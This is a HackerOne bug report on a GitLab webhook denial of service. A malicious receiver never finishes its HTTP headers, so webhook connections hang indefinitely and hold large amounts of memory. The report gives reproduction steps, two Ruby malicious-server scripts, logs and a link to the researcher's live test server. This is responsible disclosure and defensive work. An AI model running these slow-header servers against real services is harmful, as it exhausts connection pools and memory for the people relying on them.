Evil webhook DoS 2: Giant Headers
HackerOne report #1252116 by afewgoats on 2021-07-05, assigned to H1 Triage:
Report
Summary
Gitlab Webhooks do not properly obey timeouts, so connections can be forced to last forever.
The previous bug 1029269 was patched, but I found a way to bypass the fix. Instead of sending data slowly in the HTTP body, send data forever in the HTTP header section.
In the patch, a block is passed to HTTParty. However, this block is only called after the headers have been processed and the body data starts to arrive.
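For illustration, here is a minimal sketch of that pattern, assuming an HTTParty-style streaming block (not the actual GitLab code; the URL and timeout value are made up):

require 'httparty'

start_time = Time.now
read_total_timeout = 20 # illustrative value, in seconds

HTTParty.post('http://maliciousserver:3000/xyz', body: '{}') do |fragment|
  # This block only runs once the header section is complete and body
  # fragments start arriving, so a connection stuck in the header phase
  # is never checked against the deadline.
  elapsed = Time.now - start_time
  raise "Request timed out after #{elapsed} seconds" if elapsed > read_total_timeout
end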
A malicious webhook receiver can respond in a way such that:
- The HTTP(S) connection between the Gitlab sidekiq process and the webhook server NEVER ends
- Large amounts of data are kept in memory
It's not just project webhooks. Any use of Gitlab::HTTP.post, such as system webhooks and integrations (e.g. Mattermost), is affected.
Steps to reproduce
The node server attached sends data at a rate of 1 byte per 3.21 seconds without ending the HTTP header section: HTTP/1.1 200 OK\r\nxxxxxxxxxxxxxxxxxxxx...
- Start the malicious webserver with node never-end-headers.js
- Create a project and add webhooks for issue events to http://maliciousserver:3000/xyz
- Create an issue (or close or reopen one) to trigger the webhook.
- The webhook connection will stay open forever.
Also try adding /mega to the path, which makes it send 550 MB over the first 5 minutes and then continue at the usual 1 byte per 3.21 seconds. This can reserve 550 MB in process memory. You can of course modify the script to send endless amounts of data much faster.
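The node script itself is only attached, but its behaviour can be approximated in a few lines of Ruby (a rough sketch based on the description above; the port, pacing, and sizes are illustrative, and it handles one connection at a time):

require 'socket'

server = TCPServer.new 3000
loop do
  session = server.accept
  session.gets
  session.print "HTTP/1.1 200 OK\r\n"
  # Roughly 550 MB of header bytes up front (the attached script paces
  # this over the first ~5 minutes) ...
  (550 * 1024).times { session.print 'x' * 1024 }
  # ... then keep the header section open indefinitely, one byte at a time.
  loop do
    session.print 'x'
    sleep 3.21
  end
end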
For your convenience you can use my test server again, but please redact the domain again: https://viii.sr/never-end/justheaders/gitlab
Examples
I did run it briefly on Gitlab.org (User-Agent: GitLab/14.1.0-pre), but killed the connection after half an hour.
What is the current bug behavior?
There is no overall timeout on the webhook connection except when using the Test Webhook function. (It also accepts huge amounts of response data in the header section.)
What is the expected correct behavior?
After 10 seconds (or some other reasonable timeout), webhook requests should time out even if headers are still being transferred. Many HTTP clients also have a header size limit.
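One way such an overall deadline could be enforced, sketched here with Ruby's Timeout module (this is not GitLab's actual fix, and post_with_deadline is a hypothetical helper):

require 'timeout'

# Hypothetical helper: a hard ceiling on the whole request, so the
# deadline also covers a header section that never ends.
def post_with_deadline(url, body, deadline: 10)
  Timeout.timeout(deadline) do
    Gitlab::HTTP.post(url, body: body)
  end
end

Timeout.timeout has its own caveats (it interrupts the thread from outside), so a socket-level read timeout on the header phase or a header size limit in the HTTP client would be a more robust complement.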
Relevant logs and/or screenshots
Never ending jobs:
After deliberately killing the connection:
{"severity":"ERROR","time":"2021-07-05T22:02:16.462Z","correlation_id":"d055442cfe2e0bf0cd4d1c9273abaa28","exception.class":"Gitlab::HTTP::ReadTotalTimeout","exception.message":"Gitlab::HTTP::ReadTotalTimeout with \"Request timed out after 332.36488593695685 seconds\"","exception.b
acktrace":["lib/gitlab/http.rb:55:in `block in perform_request'","lib/gitlab/http.rb:53:in `perform_request'","app/services/web_hook_service.rb:109:in `make_request'","app/services/web_hook_service.rb:56:in `execute'","app/workers/web_hook_worker.rb:19:in `perform'","lib/gitlab/sid
ekiq_middleware/duplicate_jobs/strategies/until_executing.rb:16:in `perform'","lib/gitlab/sidekiq_middleware/duplicate_jobs/duplicate_job.rb:41:in `perform'","lib/gitlab/sidekiq_middleware/duplicate_jobs/server.rb:8:in `call'","lib/gitlab/sidekiq_middleware/worker_context.rb:9:in `
wrap_in_optional_context'","lib/gitlab/sidekiq_middleware/worker_context/server.rb:17:in `block in call'","lib/gitlab/application_context.rb:74:in `block in use'","lib/gitlab/application_context.rb:74:in `use'","lib/gitlab/application_context.rb:27:in `with_context'","lib/gitlab/si
dekiq_middleware/worker_context/server.rb:15:in `call'","lib/gitlab/sidekiq_status/server_middleware.rb:7:in `call'","lib/gitlab/sidekiq_versioning/middleware.rb:9:in `call'","lib/gitlab/sidekiq_middleware/admin_mode/server.rb:14:in `call'","lib/gitlab/sidekiq_middleware/instrument
ation_logger.rb:9:in `call'","lib/gitlab/sidekiq_middleware/batch_loader.rb:7:in `call'","lib/gitlab/sidekiq_middleware/extra_done_log_metadata.rb:7:in `call'","lib/gitlab/sidekiq_middleware/request_store_middleware.rb:10:in `block in call'","lib/gitlab/with_request_store.rb:17:in
`enabling_request_store'","lib/gitlab/with_request_store.rb:10:in `with_request_store'","lib/gitlab/sidekiq_middleware/request_store_middleware.rb:9:in `call'","lib/gitlab/sidekiq_middleware/server_metrics.rb:29:in `block in call'","lib/gitlab/sidekiq_middleware/server_metrics.rb:5
2:in `block in instrument'","lib/gitlab/metrics/background_transaction.rb:30:in `run'","lib/gitlab/sidekiq_middleware/server_metrics.rb:52:in `instrument'","lib/gitlab/sidekiq_middleware/server_metrics.rb:28:in `call'","lib/gitlab/sidekiq_middleware/monitor.rb:8:in `block in call'"
,"lib/gitlab/sidekiq_daemon/monitor.rb:49:in `within_job'","lib/gitlab/sidekiq_middleware/monitor.rb:7:in `call'","lib/gitlab/sidekiq_middleware/size_limiter/server.rb:13:in `call'","lib/gitlab/sidekiq_logging/structured_logger.rb:19:in `call'"],"user.username":"root","tags.program
":"sidekiq","tags.locale":"en","tags.feature_category":"integrations","tags.correlation_id":"d055442cfe2e0bf0cd4d1c9273abaa28","extra.sidekiq":{"class":"WebHookWorker","args":["2","[FILTERED]","issue_hooks"],"retry":4,"queue":"web_hook","version":0,"dead":false,"jid":"710ebd1ab8d7a
f75e2fd9e18","created_at":1625522198.495918,"meta.user":"root","meta.project":"root/hookz","meta.root_namespace":"root","meta.caller_id":"GraphqlController#execute","meta.remote_ip":"172.17.0.1","meta.related_class":"ProjectHook","meta.feature_category":"not_owned","meta.client_id"
:"user/1","correlation_id":"d055442cfe2e0bf0cd4d1c9273abaa28","idempotency_key":"resque:gitlab:duplicate:web_hook:42f4ec1690d28151b9660ac15937309479fb9587947c60a56e9aa77c318ddeb5","enqueued_at":1625522204.049519}}
Output of checks
This bug happens on GitLab.com and locally
Results of GitLab environment info
Gitlab-ee docker image
root@gitlab:/# gitlab-rake gitlab:env:info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.2p137
Gem Version: 3.1.4
Bundler Version:2.1.4
Rake Version: 13.0.3
Redis Version: 6.0.14
Git Version: 2.32.0
Sidekiq Version:5.2.9
Go Version: unknown
GitLab information
Version: 14.0.2-ee
Revision: 2504e045362
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 12.6
URL: https://gitlab.example.com
HTTP Clone URL: https://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 13.19.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
DoS against the webhook connection pool and process memory. Connections can last for days, and an attacker can open multiple connections at once.
The only difference in impact from the previous report is that the headers now don't get saved in the database. If after a few hours the malicious server cleanly ends the connection with a nice \r\n\r\n, the timeout-checking block will be run and Gitlab::HTTP::ReadTotalTimeout will be belatedly raised.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
The report had clear reproduction steps. I'd only add that, to make things easier to reproduce locally, it can be good to enable connections to the local network in the admin settings.
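On a local instance that setting lives under Admin Area > Settings > Network > Outbound requests; something like the following in the Rails console should have the same effect (the attribute name is my assumption and may vary between versions):

# Assumed attribute name; verify against your GitLab version.
ApplicationSetting.current.update!(allow_local_requests_from_web_hooks_and_services: true)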
Reproducing this on the Rails console
- Copy the malicious server example and save it in a file slow_server.rb.
- Start the server: ruby slow_server.rb
- In a new terminal window, open the rails console: bundle exec rails c
- Send a request: Gitlab::HTTP.get('http://localhost:9292')
- Observe that the request is blocked forever.
Malicious server example:
require 'socket'

server = TCPServer.new 9292

def start_session(server)
  while session = server.accept
    request = session.gets
    puts request

    # Send the status line, then drip the Content-Type header out one
    # byte per second so the header section stays open for ~400 seconds.
    session.print "HTTP/1.1 200\r\n"
    session.print "Content-Type: text/html"
    400.times do
      session.print 'h'
      sleep 1
    end

    # Finally terminate the header section and send a short body.
    session.print "\r\n"
    session.print "\r\n"
    session.print "Hello world! The time is #{Time.now}"
    session.close
  end
end

def listen(server)
  start_session(server)
rescue Errno::EPIPE
  # Client hung up mid-response; go back to accepting connections.
  listen(server)
end

listen(server)

